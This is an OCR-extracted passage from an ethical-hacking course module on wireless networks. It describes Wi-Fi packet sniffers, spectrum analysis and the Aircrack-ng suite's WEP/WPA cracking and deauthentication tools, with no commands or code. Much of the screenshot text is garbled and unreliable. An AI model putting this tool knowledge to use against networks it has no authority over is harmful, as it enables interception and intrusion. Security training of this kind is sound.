Wi-Fi Packet Sniffer:W ireshark with AirPcap
r EH
W i-Fi Packet Sniffer: W ireshark w ith AirPcap

Source: http://www.wireshark.org Wireshark is a network protocol analyzer. It lets userd capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions. Features: Live capture and offline analysis Standard three-pane packet browser Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility Display filters VoIP analysis Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer (compressed and uncompressed), Sniffer Pro, and NetXray, Network Instruments
Module 15 Page 2272
Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others 9 9 Capture files compressed with gzip can be decompressed on the fly Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)
Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2 Q 9 Coloring rules can be applied to the packet list for quick, intuitive analysis Output can be exported to XML, PostScript, CSV, or plaintext
Capturing from AirPcap USB wireless capture adapter nr. 00 - Wireshark
C a p tu r eg n a ly :< Jta tr c tic s T e le p h o n y Jo o * ! f c t e lp E* < * n < E< E<* * * *a i a kcsxea ^ + * ? 2 - E ip rtiu o n ... C le a rA p p ly All Frames h a n n e lO ffs e t 0 0FCS W fr e ir s sS e ttin g }... D e c r y p tio nK e y s . 8 0 2 .1 1C h a n n e l: 2 4 1 2 [B G1 ] C D e s tin a tio n Protocol N o . T im * S o u r c e In fo
1 1
frj fr i fr j fr j fr j fn f n fn fr j fr j fr i fn fn fr j fr j
sn
F ille r
2 2 7 7 1 0 0 . 7 9 1 9 2 9 b 8 : a 3 : 8 6 : 3 e : 2 f : 37 2 2 7 8 1 0 0 .8 9 2 5 5 0 b 8 : a 3 : 8 6 : 3 e : 2 f :3 7 2 2 7 9 1 0 0 .9 9 4 7 9 5 b 8 : a 3 : 8 6 : 3 e : 2 f : 37 2 2 8 0 1 0 1 .0 0 2 2 8 9 S h a n g h a i_ 2 5 : 6 3 : 1 0 2 2 8 1 1 0 1 .0 9 7 1 6 8 b 8 : a 3 : 8 6 : 3 e : 2 f :3 7 2 2 8 2 1 0 1 .1 0 4 7 8 8 S h a n g h a 1 _ 2 5 : 6 3 : l O 2 2 8 3 1 0 1 .1 7 2 9 2 1 N e t g e a r _ a e : 2 4 : c c 2284 1 0 1 .1 9 9 5 6 4 b 8 : a 3 : 8 6 : 3 e : 2 f :3 7 2 2 8 5 1 0 1 .2 0 7 1 6 2 s h a n g h a i _ 2 5 : 6 3 : 1 0 2 2 8 6 1 0 1 .2 0 7 9 1 0 S h a n g h a i _ 2 5 :6 3 : 1 1 2 2 8 7 1 0 1 .2 0 9 5 3 3 S h a n g h a i _ 2 5 : 6 3 : 1 3 2 2 8 8 1 0 1 . 3 0 2 0 4 5 b 8 : a 3 : 8 6 : 3 e : 2 f : 37 2 2 8 9 1 0 1 .3 7 7 6 7 4 N e t g e a r . a e : 2 4 : c c 2 2 9 0 1 0 1 .4 1 2 0 6 7 S h a n g h a i _ 2 5 : 6 3 : 1 0 2 2 9 1 1 0 1 .4 1 3 6 7 2 s h a n g h a i _ 2 5 : 6 3 : 1 2 2 2 9 2 1 0 1 .5 3 9 6 9 9 9 8 : e 2 : C b : 3 5 : d b :3 9 2293 1 0 1 . 582580 N e tg e a r _ a e :2 4 :c c 2 2 9 4 1 0 1 .8 2 3 4 7 1 S h a n g h a i_ 2 5 : 6 3 : 1 2 Fra m e IE E E * IE E E 1: 85 b y te s on w ir e la s (6 8 0
B ro a d c a s t B ro a d ca st B ro a d ca st B ro a d c a s t B ro a d ca st B ro a d ca st B ro a d ca st B ro a d ca st B ro a d ca st B ro a d ca st B ro a d ca st B ro a d c a s t B ro a d ca st B ro a d ca st B ro a d ca st B ro a d ca st d 2 :ff:ff:f B ro a d ca st 85 b y te s
IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E
8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1
Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon o a ta , Beacon Beacon (6 8 0 b its )
SN -609. S N 6 1 0 , SN 611, SN -2269, SN -612,

sn
fn
-0 ,
F la g s . F la g s - . F la g s - . F la g s * F la g s - . F F F F F F F F F F agsagsagsagsagsagsagsags. .F . agsags. , . , . . , . , ,
8 1 *1 0 0 , B I- 1 0 0 , 61-100, 61=100, 61-100, B I- 1 0 0 , B I- 1 0 0 , B I- 1 0 0 , 61-100, B I- 1 0 0 . B I- 1 0 0 . B I- 1 0 0 , B I- 1 0 0 .
S S S S
I I I
FN -O , FN -0, FN -0, FN -0,

fn
-2273,
-O ,
SN -1S30, SN -613, SN -2277, SN -2278, SN -2280,

sn
FN -0. FN -0, FN -0. FN -0, FN -0. FN -0, FN -0, FN -0. FN -0, FN -0, FN -0.
F la g s
-6 1 4 ,
F la g s
SN -1532, SN -2285, SN -2287, FN -9, SN -1535, SN -2303,
B I- 1 0 0 [K B I- 1 0 0 . B I- 1 0 0 . |
1 5 3 4 ,
F la g s .p .
fra n c , fra m e ,
B I- 1 0 0 ,
- 1
b its ),
c a p tu re d
8 0 2 .1 1 8 0 2 .1 1
O is a s s o c ia t e , w ir e le s s
F la g s :
...P . F . fra m e
m anagem ent
* !f o r m e d
0000 0010 0020 0030 0040 aO 1 2 020 9 640 0 d64 f 81 4 c
P a c l.e t:
00 20 5b a e 31 1 4 7 2 84 2 2 bO
IE E E
8 0 :. 11]
ed 7f 72 44 92 ff 41 47 00 4c a a Oc e a d8 do 7d 70 4 e 0 0 80 c 5 6 b 73 05 04 32 0 8 0 0 0 0 0 5 1 0 2 9 3e 04 41 do 48 63 04 20 . . ] . J . . A } p N . . H r c .K s ..c . 2 ........... A
. l".C.S. n A I/l (IA AM H A ifP c a pU S 8w ir e le s sc a p tu r ea d a p te rn r .0 0 :... P a c k e ts :2 5 7 8 D is p la y e d2 5 7 8M a r k e d ;0
e d 77 24 c c 0 9 07 d9 fO 43 c2
bb fb 6 0 14 O e 65 0 0 04 2 4 83
d .l....e
. o r ........... d
.L.)>.
Profile Default
FIGURE 15.40: Wireshark with AirPcap capturing network traffic
Module 15 Page 2273
Wi-Fi Packet Sniffer: Cascade Pilot

J It m easures w ireless channel utilization J It helps in Identifying rogue w ireless n etw orks and stations J It isolates specific packets J It provides an interactive and visuallyoriented user interface
^TC*c/yorK*>*
C EH
-^ O U p M e S o u c w
)J C )o aA ll T a b s G ra3!v 3Sttnec
**
UDetad
&J
& V*
3 F CangMMni O BarAahO verTne O Sem eeR e sp o n seT im eb yW ebO t*eet. L ig h t* O
IH a g rbyT n d fc cT yp e
/ / / * /
W i-Fi P a c k e t Sniffer: C a sc a d e Pilot

Source: http://www.riverbed.com Cascade Pilot Personal Edition (Wi-Fi pilot) is an analyzer for wired and wireless networks that revolutionizes the use of Wireshark. Fully integrated with Wireshark, Cascade Pilot Personal Edition capitalizes on users' existing expertise while dramatically increasing efficiency in identifying and diagnosing network problems. Wi-Fi Pilot does: 9 It measures wireless channel utilization from the data and spectrum points of view simultaneously It helps in identifying rogue wireless networks and stations It provides professional detailed reports
Q Q
Module 15 Page 2274
. *
1 Tim eControl Walchee1 Reportng A (W de
Cascade Pilot (66 da y\ remaevng)
-1 verta
S
Add Trace
H o m e
MFoMtl F.k
^Der>T*orK4>t*)*(
<) Jane Resdubor
O uM kSuat
ClCtonM T*,
Generd
V S u ty ^ M a a
D w ta Fites
Q G a m g S n n M
O So rvK ef
4 k Detach
MreshaA
F I
eh
efcOtotec! bgN * O Network Usage b f Traffic Type
# OevK*WPK0.41J742_;350021FE .
Microsoft Corporator (2)
M.cr s<yt Corporahcr
4 1
2 SOU T ons
a e > * > OyT1 512 PM)(_|

Q IP Corversebors * 12 PM) Is * IdJ Network Osage by Traftc Type 5 'i!
*
&MS-NetOft n g
>
>
S t a r tS c o t c h
t CaRacerdy Used
v*
fflE
s Id)
0 I,] Protocol C s tr fc / > o r &t J Protocol O strtvrt> o r B,!tes ?I,) Protocol C * s tT fe o J> c r -P*ch 6er*rc
0 0 u
3S *u
4^ '
2 1 T | W
^ I 0 4 h o 4 ? i w i o r m j t *.
^ 802
LA N arc
fiefAC*
j 6ar4jAf Usage
TK*m Ccrtversabcns ^ Pf V r^r<* rvJ Error!

User
t- v
.4MJt, Segr*rr M y s * (MSA)
Tfsrsac&cr Analysis
* //* *
-
Cievert SelacfeaB 1125 29 18 17 - 33 15 ft # 1 sec - M V M w
" 6 33
"
:;
D n p / U b D,
Network lH a 9e by Tra#* Type on Reeltck PO e G6E fenwly Controller at 5:1 5 PM
Selected Chert Retetrve Network Usage
FIGURE 15.41: Cascade Pilot Screenshot
Module 15 Page 2275
Q N M k U M p s b r T r iftc T y p
BarddJh Over Tene
E v e n t s
1 A i l i* 0 __ (11
1, 1 1 1 1 ft
/ ! A .JI., a A K
I I
1
a
g p to u b o g
AA
S' All AAA
g ^ jn .r Q *-n
< Id l o f s
PeaKe* PCk G6 Ferrrfy C or< roller
BJ--
Wi-Fi Packet Sniffer: O m niPeek I C EH

J J OmniPeek network analyzer offers real-time visibility and analysis of the network traffic from a single interface, including Ethernet, 802.11a/b/g/n wireless and VoIP It provides a comprehensive view of all wireless network activity showing each wireless network, the APs comprising that network, and the users connected to each AP
a j 3 a,. *.
j : - 11 ! 1 V
mUPMk*:> UmniK'fl
e 5:0kmc : ir ff 0 N1MK) ITM U 0 *** Pb t

0 rrrr; c e;1 e*aj n :r:
t,.r.. S-J08J
rr.r:
;7-0,dv -4
4 ,
4.HM tx1 n : n .0 *T C V 3 0 )
S.129.16) 4.4?.j 4.(7.222 tllO U M ) 4 : 4 4 2 1 < 2:2 2 0 3 !:4 4 :: ) H I4 JW SIS 8 2 W0. 7(
v Mrv*> Uiponn :1st (0
10.0.1.2
10.9.1.{
1 2 . 14.2.14 *4.121.22) . 1 4 9
1 0.0.1.1 10.0.1.1 1 0.0.1.1
: 100-1737 .
l7.Si.(7.222
157.5(.(7.222 157.5(.(7.222 10.0.4.1 10.9.1.1
.6
. 5 t 041C44W t
5 *2 * 00( 6 0
!re- :040,Oft- 4 4 3 . .fcP.. ..S-l
Stc- 4 4 3 ,D *t- U4C, .Ik..3. ,3...... 3 1 fee 1 9 4 0 ,0 k* 4 4 3 , .A 4 0 .D ai- 4 4 3 . Jk-- .S-J
BJ tznanet raecctc 2.000
DuW M n (
h ttp://w w w . wildpackets. com

U f..Y 'J (h
W i-Fi Packet Sniffer: O m niPeek

Source: http://www.wildpackets.com
__
_ _
___
____
OmniPeek network analyzer provides a graphical interface that the users can use to analyze and troubleshoot enterprise networks. It even offers Omreal-time visibility and analysis into every part of the network from a single interface, including Ethernet, Gigabit, 10 Gigabit, 802.11a/b/g/n wireless, VoIP, and Video to remote offices. Using OmniPeek's user interface and "top-down" approach to visualizing network conditions, the users can analyze, drill down and fix performance bottlenecks across multiple network segments. Highlights: Q Comprehensive network performance management and monitoring enterprise networks, including network segments at remote offices 9 of entire
Interactive monitoring of key network statistics in real-time, aggregating multiple files, and instantly drilling down to packets using the "Compass" interactive dashboard Deep packet inspection Integrated support for Ethernet, Gigabit, 10 Gigabit, 802.11a/b/g/n wireless (Including 3-stream), VoIP, Video, MPLS, and VLAN
9 9
Module 15 Page 2276
Intuitive drill-down to understand which nodes are communicating, which protocols and sub-protocols are being transmitted, and which traffic characteristics are affecting network performance Complete voice and video over IP real-time monitoring including high-level multimedia dashboard, call data record (CDR), and comprehensive signaling and media analyses Application performance monitoring and analysis in the context of overall network activity including the ability to monitor application response time, round-trip network delay, server responsiveness, database transactions per second, and myriad other lowlevel statistics. An extensible requirements
Mt view captire send Monitor T ook
architecture
that
can
be
easily tailored
to
individual
network
-
: n# Window Help W iid P a c k c H 'S m n iP c e k
> * t - H
Start i j !, jc u (( :V T
'< E
al h
< ; T !
4 1*
a]
0 .
; r >
Capture 1 x butter u u j* : fl1lr \% * Accept dll packets
4,000 fltnrd: 2.000
j Start Copcuc
0fka oucm kxi here Loc F' foe hot)
Oo911boards v*tACr< o a iv d M flpdr*
*NIH J . . I
P4ckt SC LT C * 1 2 3 4 5 6 7 ' 8 9 10 11 12 13 f 16 17 18 19 20 21 22 23 24 25 2( 27 28 ' 29 30 1 0 .0 .0 .2 1 0 .0 .0 .2 1 7 3 .1 9 4 .3 6 .4 1 7 3 .1 9 4 .3 6 .4 1 0 .0 .0 .2 1 0 . 0 . 0 .2 7 4 .L 2 5 .1 2 e .1 3 9 1 0 .0 .0 .2 1 0 .0 .0 .2 1 0 .0 .0 .2 1 7 3 .1 9 4 .3 6 .2 2 1 7 3 .1 9 4 .3 6 .2 2 1 7 3 .1 9 4 .3 6 .2 2 1 7 3 .1 9 4 .3 6 .2 2 1 7 3 .1 9 4 .3 6 .2 2 1 0 .0 .0 .2 1 0 .0 .0 .2 1 2 3 .1 7 6 .3 2 .1 5 4 7 4 .1 2 5 .L 2 C .1 8 9 1 0 .0 .0 .2 1 0 .0 .0 .2 1 0 .0 .0 .S 1 5 7 .5 6 .6 7 .3 2 2 1 0 .0 .0 .5 1 G .0.G .S 1 6 7 .5 6 .6 7 .2 2 2 1 5 7 .5 6 .6 7 .2 2 2 1 0 .0 .0 .5 1 0 .0 .0 .2 1 0 .0 .0 .2 1 7 3 .1 9 4 .3 6 .4 i 1 7 3 .1 9 4 .3 6 .4 j 1 0 .0 .0 .2 LG.0 .0 .2 1 7 3 .1 9 4 .3 6 .4 1 7 3 .1 9 4 .3 6 .4 j 1 0 .0 .0 .2 1 7 4 .1 2 5 .1 2 3 .1 8 9 1 7 3 .L 9 4 .3 6 .2 2 J 1 7 3 .1 9 4 .3 6 .2 2 i 1 0 .0 .0 .2 j 1 0 .0 .0 .2 1 0 .0 .0 .2 1 0 .0 .0 .2 j 1 0 .0 .0 .2 1 L 7 3 .L 9 4 .3 6 .2 2 L23. L76. 3 2 .1 5 4 LG.0 .0 .2 j 1 0 .0 .0 .2 1 74.L 25.12B .1C 9 1 7 7 .2 4 6 .4 7 .1 5 3 1 5 7 .5 6 .6 7 .2 2 2 j 1 0 .0 .0 .5 1 5 7 .5 6 .6 7 .2 2 2 1 5 7 .5 6 .6 7 .2 2 2 s LG.0 .0 .5 1 0 .0 .0 .5 1 5 7 .5 6 .6 7 .2 2 2 1 7 3 .1 9 4 .3 6 .4 ____ 1 7 3 .L94.3 6 .4 pugs s 95 95 95 S5 64 64 163 64 2370 91 64 64 64 lie 936 64 64 70 163 64 64 70 70 64 164 1516 1518 64 es 64 R1>U3/#Ttnr C. 0X C 0 3 X 0 0 .0 X 6 5 5 X 0 C .0 X 2 0 0 X 0 C .031C 45X 0 C .0 3S 625X 0 0 .0 3 9 6 4 5 X 0 C .7 7 1222X 0 C.8 1 1 8 9 3 X 0 4 .3 1 8 2 3 5 X 0 4 . 31E3010C0 4.3 5 2 1 2 7 X 0 4 .3 5 4 1 4 7 X 0 4.35S C 64X 0 4 .5 3 5 2 9 4 X 0 4 .5 5 6 9 6 3 X 0 4 .5 3 7C 00X 0 6.097C 97X 0 6 .1 X 1 1 3 X 0 6 .9 2 2 6 4 5 X 0 6 .9 5 2 1 3 7 X 0 T .2 1 6 2 2 3 X 0 7 .3 0 1 4 4 9 X 0 7 . 5554 35 X 0 7.5 5 C 9 2 5 X 0 7 .5 X 2 9 0 X 0 7.8S C S 86X 0 7 .8 5 2 2 0 7 X 0 7 .8 5 3 3 3 5 X 0 8.001C 46X 0 6.001C 9 0 X 0 Protocol HTTPS HTTPS HTTPS ITT?3 HTTPS HTTPS 3ITP3 HITPS HITPS HTTPS HTTP3 HITPS DTPS HTTPS HTTPS HITPS HIT? HIT? HTTPS 3TTP3 HIT? HITPS HTTP5 HTTPS HTTPS HITPS HITPS HTTPS HTTPS HITPS
I!
Surwrvry Cxprit Src 1 7 6 9 ,DSC 4 4 3 ,.A P .. . .S - 1 4 B 6 ... Src 17T0,D 3t 4 4 3 ,.A P .. .,3 3 8 6 5 ... S r c - 4 4 3 , 01770 - , . AP. . . . s - 7 9 6 ... S r c - 4 4 3 ,D as- 1 7 6 9 ,.A P .. . , 3 - 3 0 3 3 . . . Src= 1 7 6 9 ,0 8 t= 4 1 3 ,. A . . . . , S - 1 4 2 6 .. . Src= 1 7 7 0 ,D3t= 4 4 3 ,. A . . . ..3 = 3 8 6 5 ... Src= 4 4 3 ,D3t= 1 0 5 3 ,.A ? .. ..3 = 1 7 0 9 ... . . 3Src- 1 0 8 3 , 4 4 3 - , A. . .9 5 6 ... Src= 10SL ,D st= 4 4 3 ,.A P .. . , S=. 0 0 7 ... Src= 1 0 5 1 ,D3t= 4 4 3 ,.A P .. - .5= 0 D 7 ... Src= 4 4 3 , 01051 = , . A. . . ..3 = 9 4 . . . S r c - 4 4 3 , 01051 - , . A. . . . , 3- 9 4 . . . S r c - 4 4 3 , D31051 - , . A. . . . , S- 9 4 . . . Src= 443,D St= 1 0 5 1 ,.A P .. .5= 94. . . Slow Se r v er R esponse Time (C Src= 4 4 3 ,D3u= 1 0 5 1 ,A ? .. -.3 = 94. . . S r c - 105L, 443 - , . A. . . . , S- 4 0 0 7 ... C PORI-1728 . Src= 80, 1723 = , A. . . . , S= 9 9 7 ... 5rc= 4 4 3 ,D3t= 1 0 8 3 ,.A P .. .,3 = 1 7 0 9 ... 3rc= 1 0 6 3 ,0 3t= 4 4 3 ,. A . . . ..3 = 9 5 6 ... C PORI-172" . Src= 1040 , =*, 443 ------ S .,S = 1 8 3 0 ... 5rc= 4 4 3 ,D 9ts 1 0 4 0 ,.A ..5 - .5= 5 1 9 ... S rc* 1 0 4 0 ,Oat* 4 4 3 ,. A . . . . , 3 - 1 8 3 0 . . . Src- 1 0 4 0 , 4 4 3 - , . ,.3 AP. -1 8 . 3 0 ... , SS r c - 4 4 3 , 1 0 4 0 - 0 , . A. . . S 1 9 ... Slow S erver Rcaponrc Ti m (0 sr c 4 4 3 ,DSt 1 0 4 0 ,.A .. . . 5 5 1 9 ... Src 1 0 4 0 ,D 3 t- 443, . A ... . , 3 - 1 8 3 0 . . . Src- 1 7 7 0 , 4 4 3 - , . ,. S AP. - 3 .8 6 3 .. . Src- 1 7 7 0 , 4 1 3 - , . ,. S A.-R. 3 8 6 9 .. . rhernrt Petkriv ?.000 D uinton 001:25 0 ,Jcne
1 1 hers Expert
fla t
Web Servers
*rxjes
Voice & Video
Visuals
^2e^M ap
ôtoccb S jrw r
Mr fo r Help, press f
FIGURE 15.42: OmniPeek analyzing enterprise network
Module 15 Page 2277
Wi-Fi Packet Sniffer: C om m View for Wi-Fi

J CommView for Wi-Fi is designed for capturing and analyzing network packets on wireless 802.11a/b/g/n networks
CEH
F e a tu re s
6 It gathers information from the wireless adapter and decodes the analyzed data s It can decrypt packets utilizing user-defined W E P or WPA-PSK keys and decode them to the lowest layer, with full analysis of the most widespread protocol
. CommView for WiFi -D Link AirPremier DWI-AG530 Wireless PCI Adapter

File Search View Tools Settings R iies Help
'Ig S ^ lR F R F ?
(>) Nodes | (m ) Channels | ^ Latest IP Connections ^ Packets
Logging | ^
Rules |
Broadcast 01:00:5E:... 33:33:00:... Broadcast Broadcast 0x0000 0x0010 0x0020 0x0030 0x0040 08 00 45 4 1 2C 0 0 0 0 OF 3D 0 2 B 3 9 6 OC IC 00 00 A 8 00 01 0 18 40 D5 0 20
N/A 192.168.0.4 158.22.250.0 192.168.0.4 N/A 00
N/A 239.255.2... 0.0.0.12 192.168.0.1 N/A 14 00 AS 2D 6 1 00 00 08
N/A 1900 1900 N/A N/A 2F 00
Quick Filter Open Packet(s) m New Window
1 9 -0 5 00
A I-A A AA 0 3
Copy Address Copy Packet Send Packet(s) Save Packet(s) As ... SmartWhois Clear Packet Btifer
4F 2 ................................................................................................
co
50
Raw contents of the packet
] W1 r*ls P*ck*t Info Sign*! kvtl: 0144 (68) Rt: S4.0 Mbps Band: 802.1 lg Ch*nr*J: 11 2462 MH* Date: 7-X1I-2006 Tim: 13:21:5S .677507 Capture: Off
Decoded packet information for the selected packet
Packets: 29,6931Keys: W E P.W PA
Auto-saving: o ff
Rules: O fu
http ://w w w . tamos, com

Copyright b y
EG-G*ancil. All
Rights Reserved. Reproduction is Strictly Prohibited
W i-Fi Packet Sniffer: Com m View for W i-F i

Source: http://www.tamos.com CommView for Wi-Fi is a wireless network monitor and analyzer for 802.11 a/b/g/n networks. It captures every packet on the air to display important information such as the list of access points and stations, per-node and per-channel statistics, signal strength, a list of packets and network connections, protocol distribution charts, etc. By providing this information, CommView for Wi-Fi can help user view and examine packets, pinpoint network problems, and troubleshoot software and hardware. It includes a VoIP module for in-depth analysis, recording, and playback of SIP and H.323 voice communications. Packets can be decrypted utilizing user-defined W EP or WPA-PSK keys and are decoded down to the lowest layer. With over 70 supported protocols, this network analyzer allows users to see every detail of a captured packet using a convenient tree-like structure to display protocol layers and packet headers. Additionally, the product provides an open interface for plugging in custom decoding modules. W EP and WPA key retrieval add-ons are available subject to terms and conditions. This application runs under Windows XP/2003/Vista/2008/7 and requires a compatible wireless network adapter.
Module 15 Page 2278
C o m m V ie w fo r W iF i - D -l in k A ir P r e m ie r O W I- A G 5 3 0 W 1 r e l * * P ( I A d a p t e r F ie Se arch View Took Settings Rules Help
- i n i x|
. 1 w .&<2
1 ^ j Packcts | Loggng I
Nodes | (M j Channels | fr Latest IP Connections
1 /
Rules |
Alarms |
MNGT/BEA...
IP/UDP IP/UDP ARP REQ

MNGT/BEA...
MyAP GemtekTe... GemtekTe... GemtekTe... MyAP 08 00 4S CO 50 41 02 00 A8 18 2C B3 00 00 40
Broadcast 01:00:5E:... 33:33:00:... Broadcast Broadcast
N/A 192.168.0.4 158.22.2SC.0 192.168.0.4 N/A
N/A 239.2SS.2... 0.0.0.12 192.168.0.1 N/A
N/A 1900 1900 N/A N/A .A
Reconstruct TCP Session

Quick F fter O p en P ac k e t(s ) in New W indow C rea te Abas
a...
)ted...
) t e d . . .
0 .
0x0000 OxOOlO 0x0020 0x0030 0x0040
00 00 OF 3D B9-05 00 00 14 A5 2D 61 2F OC EC 20 A 8 - A A A A 03 00 00 00 08 00 4F 2 01 0 R a w contents of the packet DS 0. ____ _. .. .. .. _ _
9 6
C o p y Address
K . A P.
C o p y Packet Se n d P ac ket(s) S a v e P ac k e t(s ) A s ... Sm artW hois
11
Q Wlwl Packet Info & nel kvd: 0x44 (88) R *t: 54.0 Mbps
$ 02.119
D e c o d e d packet information for the selected packet

Clear Packet Buffer Decode As Font
Channel: 1 1 2462 MHz Date: 7 Jul-2006 Tim13 a155W750?

C ap tu re: O ff
Packets: 29,693 | K eys: W E P ,W P A
Auto-saving: Off
Rules: OfL
FIGURE 15.43: CommView for Wi-Fi screenshot
Module 15 Page 2279
What Is Spectrum Analysis?

RF spectrum analyzers exam ine Wi-Fi radio transm issions and m easure the pow er (am plitude) of radio signals and RF pulses, and transform these m easurem ents into num eric sequences
Urt1fw4
CEH
ilhiul lUtbM
Spectrum analyzers employ statistical analysis to plot spectral usage, quantify "air quality, and isolate transmission sources
RF spectrum analyzers are used by RF technicians to install and maintain wireless networks, and identify sources of interference
Wi-Fi spectrum analysis also helps in wireless attack detection, including Denial of Service attacks, authentication/ encryptions attacks, network penetration attacks, etc.
Spectrum analysis tools: Wi-Spy and Chanalyzer AirMagnet Wi-Fi Analyzer WifiEagle
Copyright by EG-GtODCil. All Rights R eserved. Reproduction is Strictly Prohibited.
0 1 What Is Spectrum Analysis?

RF spectrum analyzers examine the Wi-Fi radio transmission, measure the power (amplitude) of radio signals and RF pulses, and transform these measurements into numeric sequences. Spectrum analyzers employ statistical analysis to plot spectral usage, quantify "air quality," and isolate transmission sources. RF spectrum analyzers are used by RF technicians to install and maintain wireless networks, and identify sources of interference. Wi-Fi spectrum analysis also helps in wireless attack detection, including denial-of-service attacks, authentication/ encryptions attacks, network penetration attacks, etc. Traditional spectrum analyzers are purpose-built test equipment. Wi-Fi spectrum analyzers can be used in many ways. Consider the task of identifying and avoiding interference between the WLAN and devices competing for the same frequencies. If you suspect RF interference, turn off the affected AP or station, then use one of the Wi-Fi spectrum analyzer tools to see whether any device is transmitting within a given frequency range. If the interference exists, then the users can eliminate the interference by reconfiguring the WLAN to another band or channel that don't overlap other frequencies in the vicinity. Or else try to remove the interference or shield the source of interference. Spectrum analysis tools: Wi-Spy and Chanalyzer, AirMagnet Wi-Fi Analyzer, WifiEagle, etc.
Module 15 Page 2280
Wi-Fi P acket Sniffers

h t t p :/ / w w w .n e t s c o u t .c o m
Sniffer Portable Professional Analyzer
CEH
h ttp :/ / w w w .a ir s c a n n e r .c o m
Airscanner Mobile Sniffer
h ttp :/ / w w w .c o la s o f t ,c o m
Capsa WiFi
h t t p :/ / w w w .n e t w o r k in s t r u m e n t s .c o m
Observer
h t t p :/ / w w w .p a e s s le r .c o m
PRTG Network Monitor
h tt p :/ / w if is c a n n e r .s o u r c e fo r g e .n e t
WifiScanner
h ttp :/ / w w w .m o n o lit h 8 1 .d e \
NetworkMiner
ApSniff
BBS aac
h t t p :/ / w w w .m o n o lit h 8 1 .d e
Mognet
h ttp :/ / w w w .n e t r e s e c .c o m
::[nnl EI h b I
h ttp :/ / ip e r f .s o u r c e fo r g e .n e t
Iperf
Copyright b y
EG-G*ancil. All
W i-Fi Packet Sniffers
Wi-Fi packet sniffers help you to monitor, detect, and troubleshoot critical network and application performance problems. Various Wi-Fi packet sniffers that are readily available in the market are listed as follows: 9 9 9 9 9 9 9 9 9 9 Sniffer Portable Professional Analyzer available at http://www.netscout.com Capsa WiFi available at http://www.colasoft.com PRTG Network Monitor available at http://www.paessler.com ApSniff available at http://www.monolith81.de NetworkMiner available at http://www.netresec.com Airscanner Mobile Sniffer available at http://www.airscanner.com Observer available at http://www.networkinstruments.com WifiScanner available at http://wifiscanner.sourceforge.net Mognet available at http://www.monolith81.de Iperf available at http://iperf.sourceforge.net
Module 15 Page 2281
CEH
C ra c k
Wi-Fi Encryption
Launch Wireless Attacks
Copyright @ b y iC - G 0 U C il. All Rights Reserved. Reproduction is Strictly Prohibited.
W ireless Hacking Methodology

C vAs the discovery, mapping, and analysis of the target wireless network is done, it's time to launch attacks on it. Many active attacks such as fragmentation attacks, MAC spoofing attacks, denial-of-service attacks, ARP poisoning attacks, etc. can be launched against wireless networks. The following slides give you a detailed explanation about each attack and how it is launched.
Module 15 Page 2282
A ircrack-ng Suite
Aircrack-ng is a n etw ork so ftw are suite consisting of a detector, packet sniffer, W E P and W PA/W PA2-PSK cracker and analysis tool for 802.11 wireless networks. This program runs under Linux and W indow s.
CEH
http://www.aircrack-ng.org
Airgraph-ng
Used for traffic generation, fake authentication, packet replay, and ARP request injection
Creates client to AP relationship and common probe graph from airodum p file
\ f
Airodump-ng
Used to capture packets o f raw 802.11 frames and collect W E P IVs
Airolib-ng
Store and manage essid and password lists used in W P A / W P A 2 cracking
Airserv-ng
Allow s multiple programs to independently use a Wi-Fi card via a client-server TCP connection
Airmonng
Used to enable m onitor m ode on wireless interfaces from managed m ode and vice versa
Airtun-ng
Packetforge-ng
Allows you to communicate via a WEP-encrypted access point (AP) without knowing the WEP key
Used to create encrypted packets th at can subsequently be used for injection : f I
Tkiptun-ng
Creates a virtual tunnel interface to monitor encrypted traffic and inject arbitrary traffic into a network
/ Wesside-ng
Incorporates a num ber of techniques to seamlessly obtain a L W E P key in m in u te s !
Injects frames into a WPA TKIP network with
QoS, and can recover MIC key and keystream from Wi-Fi traffic
Copyright b y iC - G 0 U C il. All Rights Reserved. Reproduction is Strictly Prohibited.
Aircrack-ng Suite
1 9 Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP, and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless networks. This program runs under Linux and Windows. It works with any wireless card whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b, and 802.l l g traffic. The suite includes many programs. The following is the list of programs included in the Aircrack-ng suite: Program Name Airbaseng Aircrack-ng Airdecap-ng Description Captures WPA/WPA2 handshake and can act as an ad-hoc access point Defacto WEP and WPA/ WPA2-PSK cracking tool Decrypt WEP/WPA/ WPA2 and can be used to strip the wireless headers from Wi-Fi packets Removes WEP cloaking from a pcap file Provides status information about the wireless drivers on your system
Airdecloak-ng Removes W EP cloaking from a pcap file Airdrop-ng Aireplay-ng
This program is used for targeted, rule-based deauthentication of users Used for traffic generation, fake authentication, packet replay, and ARP
Module 15 Page 2283
request injection Airgraph-ng Creates client to AP relationship and common probe graph from airodump file Used to capture packets of raw 802.11 frames and collect W EP IVs Store and manage ESSID and password lists used in WPA/ WPA2 cracking Allows multiple programs to independently use a Wi-Fi server TCP connection card via a client-
Airodump-ng Airolib-ng Airserv-ng
Airmon-ng
